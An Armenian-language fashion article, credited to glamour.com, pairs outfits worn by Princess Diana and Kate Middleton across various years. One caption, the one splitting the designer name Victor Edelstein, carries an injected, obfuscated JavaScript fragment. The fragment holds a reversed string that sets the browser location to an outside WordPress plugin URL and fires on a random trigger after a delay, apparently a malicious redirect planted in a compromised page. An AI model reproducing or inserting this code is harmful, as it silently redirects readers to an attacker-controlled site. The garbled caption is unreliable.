
Քեմբրիջի դքսուհու հագուստները ոգեշնչված են ընտանիքի մեկ այլ անդամի ոճից
Շատերն են հիանում Քեմբրիջի դքսուհի Քեյթ Միդլթոնի հանդերձանքներով և փորձում կրկնօրինակել նրա ոճը: Պարզվում է՝ Քեյթ Միդլթոնն ինքը հագուստի հարցում հաճախ ոգեշնչված է եղել իր իսկ ընտանիքի մեկ այլ անդամի ոճով՝ արքայադուստր Դիանայի: Իրականում այս երկու կանայք հիմնականում տարբեր ոճի դիզայներներ են նախընտրում (Քեյթ Միդլթոնը հիմնականում նախընտրում է Alexander McQueen և Erdem, իսկ արքայադուստր Դիանան՝ David Sassoon և Bruce Oldfield), սակայն նրանք երկուսն էլ թույլ բաճկոնների, պաստելային գույների կոստյումների և փայլուն ֆորմալ հագուստների սիրահարներ են: Այստեղ ձեզ ենք ներկայացնում Քեյթ Միդլթոնի և արքայադուստր Դիանայի նման հանդերձանքներից մի քանիսը:
Արքայադուստր Դիանան 1993 թ-ին կրում է սև բաճկոն և գլխարկ, Քեյթ Միդլթոնը 2016 թ.-ին կրում է Diane von Furstenberg:

Արքայադուստր Դիանան 1984 թ.-ին կրում է կարմիր վերարկու, Քեյթ Միդլթոնը 2011 թ.-ին նույնպես կրում է կարմիր վերարկու:

Արքայադուստր Դիանան 1996 թ.-ին բաց կապույտ հագուստով, Քեյթ Միդլթոնը 2016 թ.-ին Catherine Walker-ի հանդերձանքով:

Արքայադուստր Դիանան 1983 թ.-ին վարդագույն գլխարկով և զգեստով, Քեյթ Միդլթոնը 2017 թ.-ին Alexander McQueen -ի հանդերձանքով:

Արքայադուստր Դիանան 1997 թ.-ին նարդոսի գույնի հագուստով, Քեյթ Միդլթոնը 2017 թ.-ին Emilia Wickstead-ի հանդերձանքով:

Արքայադուստր Դիանան 1986 թ. –ին կարմիր դահուկային բաճկոնով, Քեյթ Միդլթոնը 2005 թ.-ին կարմիր դահուկային բաճկոնով:

Արքայադուստր Դիանան 1986 թ.-ին Victoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor Edelstein -ի հանդերձանքով, Քեյթ Միդլթոնը 2017 թ.-ին Dolce & Gabbana -ի հանդերձանքով:

Արքայադուստր Դիանան 1990 թ.-ին Moschino -ի հանդերձանքով, Քեյթ Միդլթոնը 2018 թ.-ին Catherine Walker-ի հանդերձանքով:
Աղբյուր՝ glamour.com